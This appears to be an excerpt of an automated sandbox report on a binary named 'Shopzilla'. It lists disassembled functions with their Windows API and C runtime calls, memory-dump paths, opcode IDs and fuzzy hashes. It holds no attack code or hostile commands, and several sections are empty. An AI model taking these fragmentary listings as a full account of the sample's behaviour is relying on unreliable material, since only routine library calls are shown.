                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                              • String ID:
                                              • API String ID: 1372826849-0
                                              • Opcode ID: 47c437d0afc64558b49d648693ad99e2c1429487b64743af58efec93948f53b3
                                              • Instruction ID: 4956b5086ac661be5b846d6619ba92bfbe9ce7fd76be27a7b4e86693d3034cc0
                                              • Opcode Fuzzy Hash: 47c437d0afc64558b49d648693ad99e2c1429487b64743af58efec93948f53b3
                                              • Instruction Fuzzy Hash: FE01F535340B12AAD6342724EC92F2E33D8DF81B61F6001BDF401EA181DEB0AC8047B0
                                              APIs
                                              • _free.LIBCMT ref: 00C09143
                                                • Part of subcall function 00BC2EB5: RtlFreeHeap.NTDLL(00000000,00000000,?,00BC9B84,00000000,00BC8C8D,00BC58F3), ref: 00BC2EC9
                                                • Part of subcall function 00BC2EB5: GetLastError.KERNEL32(00000000,?,00BC9B84,00000000,00BC8C8D,00BC58F3), ref: 00BC2EDB
                                              • _free.LIBCMT ref: 00C09154
                                              • _free.LIBCMT ref: 00C09166
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 144f5af94d943480d36d389951f06cd61afa83af8249d10b620ede2dc82f263b
                                              • Instruction ID: 8ed3ceb842af4b811626e3af1bffedcbacf81806312d75b8a2cecb9160e1087e
                                              • Opcode Fuzzy Hash: 144f5af94d943480d36d389951f06cd61afa83af8249d10b620ede2dc82f263b
                                              • Instruction Fuzzy Hash: EDE012B5B0160342CA2466786944F9713DC9F48751714045DB95AE7283CE34E941C168
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CALL
                                              • API String ID: 0-4196123274
                                              • Opcode ID: 4861a9732acc232655f30df355c59e221971cc6397f1e5ca949fd0bd92f8a8aa
                                              • Instruction ID: f1798de45f9b5f2a077f842fde98879055af7fbe3c47ae1237032507425ae087
                                              • Opcode Fuzzy Hash: 4861a9732acc232655f30df355c59e221971cc6397f1e5ca949fd0bd92f8a8aa
                                              • Instruction Fuzzy Hash: 8C3239B0508301DFD724DF14C494A6ABBE1FF46304F1889ADE89A9B362D775ED85CB82
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID: EA06
                                              • API String ID: 4104443479-3962188686
                                              • Opcode ID: 866d47e56321661fa11fd80c0547ecda0a79f02c78324b223ab7ce36db258a90
                                              • Instruction ID: 8aa0bd967ca0168bb1b498ea1308a03116a0b68c97a2f51b5a026a2d20f47853
                                              • Opcode Fuzzy Hash: 866d47e56321661fa11fd80c0547ecda0a79f02c78324b223ab7ce36db258a90
                                              • Instruction Fuzzy Hash: 15416B21A041586FDF21AB6488917FF7FE5EB45310F5840E5E9C2AB287C7B09D88C7A2
                                              APIs
                                              • _strcat.LIBCMT ref: 00C1DFD4
                                                • Part of subcall function 00BA4D37: __itow.LIBCMT ref: 00BA4D62
                                                • Part of subcall function 00BA4D37: __swprintf.LIBCMT ref: 00BA4DAC
                                              • _wcscpy.LIBCMT ref: 00C1E063
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: __itow__swprintf_strcat_wcscpy
                                              • String ID:
                                              • API String ID: 1012013722-0
                                              • Opcode ID: 5c3e6387cecca34c06e9d76f544f8b47847955b331a259d9c2bfb376dfac2a24
                                              • Instruction ID: 1b1904f53653ed5d94c54c0a97643149832e5e512dc7904b13fabe519f37527e
                                              • Opcode Fuzzy Hash: 5c3e6387cecca34c06e9d76f544f8b47847955b331a259d9c2bfb376dfac2a24
                                              • Instruction Fuzzy Hash: 84911A35A00504EFCB28DF28C5919ADB7E5EF5A310B658499EC5ACF362DB30EE41DB81
                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE ref: 00BC0E05
                                              • Sleep.KERNELBASE ref: 00BC0E17
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ChangeCloseFindNotificationSleep
                                              • String ID:
                                              • API String ID: 1821831730-0
                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction ID: 9b522e3d3d81d830762d0d85ed8f1023677502f9b5f0104a0dde08eaff48bedc
                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction Fuzzy Hash: 7231D674A10106DBCB18EF98C4C0A69F7E6FB49300B6486E9E80ACB256D730EDC1DBC0
                                              APIs
                                              • IsThemeActive.UXTHEME ref: 00BB5FEF
                                                • Part of subcall function 00BC34CE: __lock.LIBCMT ref: 00BC34D4
                                                • Part of subcall function 00BC34CE: DecodePointer.KERNEL32(00000001,?,00BB6004,00BF8675), ref: 00BC34E0
                                                • Part of subcall function 00BC34CE: EncodePointer.KERNEL32(?,?,00BB6004,00BF8675), ref: 00BC34EB
                                                • Part of subcall function 00BB5F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00BB5F18
                                                • Part of subcall function 00BB5F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00BB5F2D
                                                • Part of subcall function 00BB5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BB526C
                                                • Part of subcall function 00BB5240: IsDebuggerPresent.KERNEL32 ref: 00BB527E
                                                • Part of subcall function 00BB5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00BB52E6
                                                • Part of subcall function 00BB5240: SetCurrentDirectoryW.KERNEL32(?), ref: 00BB5366
                                              • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00BB602F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                              • String ID:
                                              • API String ID: 1438897964-0
                                              • Opcode ID: 85fc026f06b33a230603e3dc761cd886b22300cc4c4770857705a82b34ce5906
                                              • Instruction ID: d39ee4d46ef54940b08f1db1d6d8fab6c065ece01bb3ed3cbd09b814d3282032
                                              • Opcode Fuzzy Hash: 85fc026f06b33a230603e3dc761cd886b22300cc4c4770857705a82b34ce5906
                                              • Instruction Fuzzy Hash: 24116A719083019BC320EF6AEC49B5EBFE8EF85710F104A5EF094872A1DBB099448B92
                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00BB3E72,?,?,?,00000000), ref: 00BB4327
                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00BB3E72,?,?,?,00000000), ref: 00BF0697
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 00bfa61dd35fc75cb42ccd40e7046c5a85d33e73e871269a87e3265d3d684547
                                              • Instruction ID: b5fd7987d06e718f15276561b19735512f74b6f6f0587cc09d9b940c6def387a
                                              • Opcode Fuzzy Hash: 00bfa61dd35fc75cb42ccd40e7046c5a85d33e73e871269a87e3265d3d684547
                                              • Instruction Fuzzy Hash: 170180B0244208BFF3205E248C8AFB67ADCFB05768F14C259BAE46A1E1C7F15C498B14
                                              APIs
                                                • Part of subcall function 00BC586C: __FF_MSGBANNER.LIBCMT ref: 00BC5883
                                                • Part of subcall function 00BC586C: __NMSG_WRITE.LIBCMT ref: 00BC588A
                                                • Part of subcall function 00BC586C: RtlAllocateHeap.NTDLL(00D20000,00000000,00000001,?,00000004,?,?,00BC0F33,?), ref: 00BC58AF
                                              • std::exception::exception.LIBCMT ref: 00BC0F4C
                                              • __CxxThrowException@8.LIBCMT ref: 00BC0F61
                                                • Part of subcall function 00BC86FB: RaiseException.KERNEL32(?,?,?,00C5AE78,?,?,?,?,?,00BC0F66,?,00C5AE78,?,00000001), ref: 00BC8750
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                              • String ID:
                                              • API String ID: 3902256705-0
                                              • Opcode ID: 02e5b0c5d4fb59b1d34a81b5659fed3c2e734cb39e6cbca8a4dec6dfad78d174
                                              • Instruction ID: 899a225f0acb07395daaf51bc1b9838c1a18b6f3b3636a349c8a413c3a07766a
                                              • Opcode Fuzzy Hash: 02e5b0c5d4fb59b1d34a81b5659fed3c2e734cb39e6cbca8a4dec6dfad78d174
                                              • Instruction Fuzzy Hash: 95F0817152820DA6CB20BA68E811FDE7BE89F11351F5005ADFC1492181DFB19B90C6E5
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: __lock_file_memset
                                              • String ID:
                                              • API String ID: 26237723-0
                                              • Opcode ID: dda28fe99becdac0072d34e17033b92471b878d7bca837beba97c73ca26734ec
                                              • Instruction ID: 8752cb65af9976e3a1421f871ea401175fbaed1575e0df504309ceaea1e340fe
                                              • Opcode Fuzzy Hash: dda28fe99becdac0072d34e17033b92471b878d7bca837beba97c73ca26734ec
                                              • Instruction Fuzzy Hash: 26014471801609EBCF22AF658C01E9E7BE1FF90760F14429EF8245A191DB719EE1DBA1
                                              APIs
                                                • Part of subcall function 00BC8C88: __getptd_noexit.LIBCMT ref: 00BC8C88
                                              • __lock_file.LIBCMT ref: 00BC553B
                                                • Part of subcall function 00BC6D6E: __lock.LIBCMT ref: 00BC6D91
                                              • __fclose_nolock.LIBCMT ref: 00BC5546
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                              • String ID:
                                              • API String ID: 2800547568-0
                                              • Opcode ID: c3c1386d64534e2680279930e109aacb4e6a6e364c3ea2f5b366825390c7c1ae
                                              • Instruction ID: 0e17ac73726705e3488618c03133d4765d961249748f1db0cccbad435b8983a6
                                              • Opcode Fuzzy Hash: c3c1386d64534e2680279930e109aacb4e6a6e364c3ea2f5b366825390c7c1ae
                                              • Instruction Fuzzy Hash: 80F09071901B059AD720AB659C02F6E67E1AF50331F14828DB425AB1C2CF7C9E819B55
                                              APIs
                                              • __lock_file.LIBCMT ref: 00BC5DE4
                                              • __ftell_nolock.LIBCMT ref: 00BC5DEF
                                                • Part of subcall function 00BC8C88: __getptd_noexit.LIBCMT ref: 00BC8C88
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: __ftell_nolock__getptd_noexit__lock_file
                                              • String ID:
                                              • API String ID: 2999321469-0
                                              • Opcode ID: 3c3ce4863297f9362954cb646c31a8d6e38faaad33c4abb2b28e03921ff7055b
                                              • Instruction ID: 330806f09819d0b9f6ad8d42729639bf196ab49a680e37ead030fc1fffef05fc
                                              • Opcode Fuzzy Hash: 3c3ce4863297f9362954cb646c31a8d6e38faaad33c4abb2b28e03921ff7055b
                                              • Instruction Fuzzy Hash: 21F0EC319016059AD720BB754C43FAE76D0AF40331F1042DDF011EB1C1CF789F825A65
                                              APIs
                                              • _memset.LIBCMT ref: 00BB5AEF
                                              • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00BB5B1F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell__memset
                                              • String ID:
                                              • API String ID: 928536360-0
                                              • Opcode ID: 901f5a61a6d0f018e96bad04abb14c57a49700deb9cfe49dc8f22a2c1d5427ff
                                              • Instruction ID: 28b916e74e66744ef4f6e5bf10372621c4611fbb54cb4ab7bb9888f877abe071
                                              • Opcode Fuzzy Hash: 901f5a61a6d0f018e96bad04abb14c57a49700deb9cfe49dc8f22a2c1d5427ff
                                              • Instruction Fuzzy Hash: D6F037719043189FDBB29F64DC45BE97BBC970170CF0001EDEA4896296DBB54B88CF55
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: LoadString$__swprintf
                                              • String ID:
                                              • API String ID: 207118244-0
                                              • Opcode ID: 2bd290865b5f7be10ab003e9c8119764c6b1cc9f0809d7aafa483e475803f57c
                                              • Instruction ID: a11ed005c5b2f80097813faf7fde41ad9ea41a0f7dfe8e9223dee4a9186cec84
                                              • Opcode Fuzzy Hash: 2bd290865b5f7be10ab003e9c8119764c6b1cc9f0809d7aafa483e475803f57c
                                              • Instruction Fuzzy Hash: CFB18F35A4010AEFCB14DF94C891DFEB7B5FF49310F60805AF925AB291DB70AA81DB90
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c03eda3b5c9ef91a577066b92123074178f762d49d6b7b75f837565a4a164f2
                                              • Instruction ID: 4a68554ff93345acb5ee26d3c575294dbe82c969845fbf00e5bba1ec00c460d8
                                              • Opcode Fuzzy Hash: 7c03eda3b5c9ef91a577066b92123074178f762d49d6b7b75f837565a4a164f2
                                              • Instruction Fuzzy Hash: 2961BF70608206DFDB10DF50C881E7BB7E9EF4A300F1585ADE91A9B291E775ED80CB62
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4b0a5f59f33c87e989d49e4f452b5c7c7d4f1a33e69aa496a15ab04c2b4e9de2
                                              • Instruction ID: 15bc68d7c0a8c6b227bc67fd4b70d8b79b923300504382ee8d97bd43217083fd
                                              • Opcode Fuzzy Hash: 4b0a5f59f33c87e989d49e4f452b5c7c7d4f1a33e69aa496a15ab04c2b4e9de2
                                              • Instruction Fuzzy Hash: 78518F356042049FCB24EF68C991EBE77E5AF45710F1481E8F91AAB392CB70EE01DB90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: 6d56029a1d4209a93ccb965244c023c537d6182e3f29dc5323de0a4681017de4
                                              • Instruction ID: 079512fe02a01cdab0423b45ec3ac2ae9d2c3c05bf0c1d9231e183913a7d791c
                                              • Opcode Fuzzy Hash: 6d56029a1d4209a93ccb965244c023c537d6182e3f29dc5323de0a4681017de4
                                              • Instruction Fuzzy Hash: 3F319E75604A02DFC724DF18D490AB1F7E0FF08710B54C6ADE98A8B751DBB0E981CB94
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00BB41B2
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: 017d1fcdea0f8494708686051d4d31e8ddb3199de754c82e976735cb280b2f87
                                              • Instruction ID: b5f87a84f5aa6bef3c9f3d95587cb94ec04f15deea15d4ea6746d49db1bdd48b
                                              • Opcode Fuzzy Hash: 017d1fcdea0f8494708686051d4d31e8ddb3199de754c82e976735cb280b2f87
                                              • Instruction Fuzzy Hash: 3E315E71A00619AFCB18DF6DC8806ADBBF5FF54310F148659E819A7712D7B0BDA4CB90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID:
                                              • API String ID: 1473721057-0
